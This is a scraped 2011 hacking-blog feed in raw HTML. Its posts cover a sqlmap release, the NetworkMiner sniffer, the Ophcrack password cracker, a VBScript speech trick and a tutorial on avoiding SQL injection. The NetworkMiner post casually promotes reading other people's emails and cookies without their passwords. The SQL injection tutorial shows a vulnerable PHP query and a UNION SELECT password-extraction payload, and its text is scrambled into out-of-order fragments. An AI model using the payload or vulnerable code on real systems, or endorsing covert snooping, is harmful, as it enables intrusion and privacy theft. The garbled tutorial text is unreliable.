vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">SQL map v.0.9 Released</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><br />
</strong></div><span class="Apple-style-span" style="font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 12px; line-height: 19px;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> Download Here:</strong></span><span class="Apple-style-span" style="font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 12px; line-height: 19px;"><strong style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"> </strong></span><br />
<span class="Apple-style-span" style="font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 12px; line-height: 19px;"><strong style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"> <a href="http://sourceforge.net/projects/sqlmap/files/" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;">http://sourceforge.net/projects/sqlmap/files/</a></strong></span><br />
<div><div><div></div></div></div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-20948342410474906722011-07-29T07:50:00.000-07:002011-07-29T07:50:36.654-07:00Network Miner 1.0<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: center;"><img alt="Network-Miner-Packet-sniffer" src="http://www.hackersgarage.com/wp-content/uploads/2011/02/Network-Miner-Packet-sniffer.png" /></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #666666; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 20px;">NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.</span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: #666666; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 20px;"><br />
</span></div><span class="Apple-style-span" style="color: #111111; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 20px;"></span><br />
<div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Network Miner is for those who are not much familiar with using WireShark. Network Miner made easy to sniff packets from the network and categories and sort it in different tabs so you can interesting sniffed stuff. You can also analyze pcap files which are dumped using WireShark.</div><div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Some cool features can be found :</strong></div><ul style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 1.667em; margin-left: 1.667em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Fully GUI application run on Windows platform.</li>
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Open source application.</li>
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Sniff User names of any mailing or social website e.g facebook,twitter,gmail and paypal so on…</li>
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">All sort of cookies can be sniffed with one click.</li>
<li style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Extraction of Facebook, Twitter, Yahoo, Windows Live(Hotmail) messages. (You don’t need password of someone to see his emails <img alt=";-)" class="wp-smiley" src="http://www.hackersgarage.com/wp-includes/images/smilies/icon_wink.gif" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /> )</li>
</ul><div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">and more detailed features can be seen on <a href="http://www.netresec.com/?page=NetworkMiner" style="color: #2361a1; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" target="_blank" title="Network Miner site">official Network Miner web</a></div><div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Network miner has recently launched payware Professional version which provide some extra features e.g reporting, geo localization, command line script support.</div><div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Although the free version is so powerful, you will love it. We have been using it for long time.</div><div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Latest version is announced today.</div><div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Download :</strong></div><blockquote style="border-left-color: rgb(221, 221, 221); border-left-style: solid; border-left-width: 1px; color: #666666; margin-bottom: 1.667em; margin-left: 0.833em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0.833em; padding-right: 0px; padding-top: 0px;"><div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Application : <a href="http://sourceforge.net/projects/networkminer/files/networkminer/NetworkMiner-1.0/NetworkMiner_1-0.zip/download" style="color: #2361a1; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" title="Click to download NetworkMiner_1-0.zip">NetworkMiner_1-0.zip</a></div><div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Source code : <a href="http://sourceforge.net/projects/networkminer/files/networkminer/NetworkMiner-1.0/NetworkMiner_1-0_source.zip/download" style="color: #2361a1; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" title="Click to download NetworkMiner_1-0_source.zip">NetworkMiner_1-0_source.zip</a></div><div style="margin-bottom: 1.667em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">ChangeLog : <a href="http://sourceforge.net/projects/networkminer/files/networkminer/NetworkMiner-1.0/ChangeLog/download" style="color: #2361a1; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" title="Click to download ChangeLog">ChangeLog</a></div></blockquote></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-45677188685239979992011-07-29T01:30:00.001-07:002011-07-29T01:30:54.263-07:00How to find whether your PC/LAPTOP is male or female ?<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 16px; line-height: 22px;"></span><br />
<div class="separator" style="clear: both; text-align: center;"><b>Using this interesting tricks you can find the gender of your computer whether your computer is male or female. Just follow the below steps.</b></div><div class="separator" style="clear: both; text-align: center;"><b><br />
</b></div><div class="separator" style="clear: both; text-align: left;"></div><ul style="line-height: 1.4; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 2.5em; padding-right: 2.5em; padding-top: 0px; text-align: left;"><li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center; text-indent: 0px;"><b>Open Notepad and paste the following code.</b></li>
</ul><span class="Apple-style-span" style="font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 16px; line-height: 22px;"><b> <span class="Apple-style-span" style="color: #38761d;">CreateObject("SAPI.SpVoice").Speak"i love you"</span></b></span><span class="Apple-style-span" style="font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 16px; line-height: 22px;"><div class="separator" style="clear: both; text-align: left;"></div><ul style="line-height: 1.4; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.5em; padding-bottom: 0px; padding-left: 2.5em; padding-right: 2.5em; padding-top: 0px; text-align: left;"><li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center; text-indent: 0px;"><b>Save notepad file as gender.vbs and close the notepad.</b></li>
<li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center; text-indent: 0px;"><b>Now open the save file .</b></li>
<li style="margin-bottom: 0.25em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center; text-indent: 0px;"><b>If you hear male voice your computer is male and if you hear female voice your computer is female.</b></li>
</ul></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-14752680342629442202011-07-29T00:52:00.000-07:002011-07-29T00:52:01.011-07:00Ophcrack is a Windows Password cracker based on Rainbow Tables<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: center;"><span class="Apple-style-span" style="color: #333333; font-family: sans-serif; font-size: 13px; line-height: 21px;"></span></div><h4 style="color: #8fc442;">Features:</h4><ul style="list-style-image: initial; list-style-position: initial; list-style-type: none; margin-left: 0px; padding-left: 2em; text-indent: -1em;"><li><span style="color: #8fc442;">»</span> Runs on Windows, Linux/Unix, Mac OS X, ...</li>
<li><span style="color: #8fc442;">»</span> Cracks LM and NTLM hashes.</li>
<li><span style="color: #8fc442;">»</span> Free tables available for Windows XP and Vista.</li>
<li><span style="color: #8fc442;">»</span> Brute-force module for simple passwords.</li>
<li><span style="color: #8fc442;">»</span> Audit mode and CSV export.</li>
<li><span style="color: #8fc442;">»</span> Real-time graphs to analyze the passwords.</li>
<li><span style="color: #8fc442;">»</span> LiveCD available to simplify the cracking.</li>
<li><span style="color: #8fc442;">»</span> Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.</li>
<li><span style="color: #8fc442;">»</span> Free and open source software (GPL).</li>
</ul><br />
<div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-large;"><a href="http://ophcrack.sourceforge.net/">http://ophcrack.sourceforge.net/</a></span></div><div style="text-align: center;"><span class="Apple-style-span" style="font-size: x-large;"><a href="http://ophcrack.sourceforge.net/">DOWNLOAD</a></span></div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-85136106953845896572011-07-29T00:39:00.000-07:002011-07-29T00:46:57.932-07:00Avoiding SQL Injection<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: right;"><div style="text-align: center;"><img src="http://www.texaswebdevelopers.com/database/blog_uploads/image/injection.jpg" /></div></div><div style="text-align: right;"><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: monospace; font-size: 14px; line-height: 20px; white-space: pre;"><b>SQL injections are among the flaws the most widespread and dangerous in PHP.</b></span></div></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"></span><br />
<pre style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>This tutorial will explain clearly the concept of SQL Injection and how to avoid </b></span></pre><pre style="text-align: center;"><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>them once and for all.</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><div style="text-align: center;"><span class="Apple-style-span" style="font-size: 14px; font-weight: bold; line-height: 20px;">
</span></div></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>-------------------------------------------------------------------</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>-</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>>>>>>></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Summary of tutorial:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>I) Presentation of the problem.</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>on</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>=> Numeric variables</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>.Method 1
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>=> The variables containing strings</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
.</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
II)Security .
<div style="text-align: center;"></div>=> Explana
t</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>iMethod 2</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>>>>>>>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>------------------------------------------------------------
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>-------</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>-</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>njection:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b> Injection into the</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>I) Presentation of the problem.</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
*</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
___________________________
<div style="text-align: center;"></div>There are two types of SQL
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>i variables that contain strings;</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>* Injection into numeric variables.</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>rently for each of these types.</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
######################
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>These are two very different types and to avoid them, it will act</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>The vari
a</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>iff</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
d</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>ebles containing strings:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>######################
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>t fetches the age of a member according to its
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Imagine a PHP script th</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>a</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>his:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++.</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>nickname. This nickname has gone from one page to another via the URL</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
+</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>by $ _GET what: p). This script should look like </b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
(</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>t..</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>$pseudo = $_GET['pseudo'];</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>$requete = mysql_query("SELECT age FROM membres WHERE pseudo='$pseudo'");</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>...
<div style="font-size: 14px; line-height: 20px; text-align: right;"></div><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</span></b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Well keep you well, this script is a big SQL injection vulnerability.</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Suffice it to a bad boy putting in place the username in the URL a query</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>like this:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">+</span></b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>' UNION SELECT password FROM membres WHERE id=1</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>It is to arrive to show (just an example), for example the password for</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>the member with the id 1. I will not explain in detail the operation for</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>fear that someone is not nice to walk around. Well, so let us go to the</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>ction is si</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>security:).</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>I) Security .
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>I_______________</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>o secure this type of inj</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
T</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>emple. You use the function</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>mysql_real_escape_string ().</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>
######################
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>er to the following cha</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Uh ... It does what it?</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>######################
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>" charac</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>This feature adds the "
\<span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">
</span></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">tracters:</span></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">
</span></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>++++++++++++++++++++++++++++++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">+</span></b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>NULL, \ x00, \ n, \ r, \, ', "and \ X1A</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre style="text-align: center;"><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>######################</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>And what's the point?</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
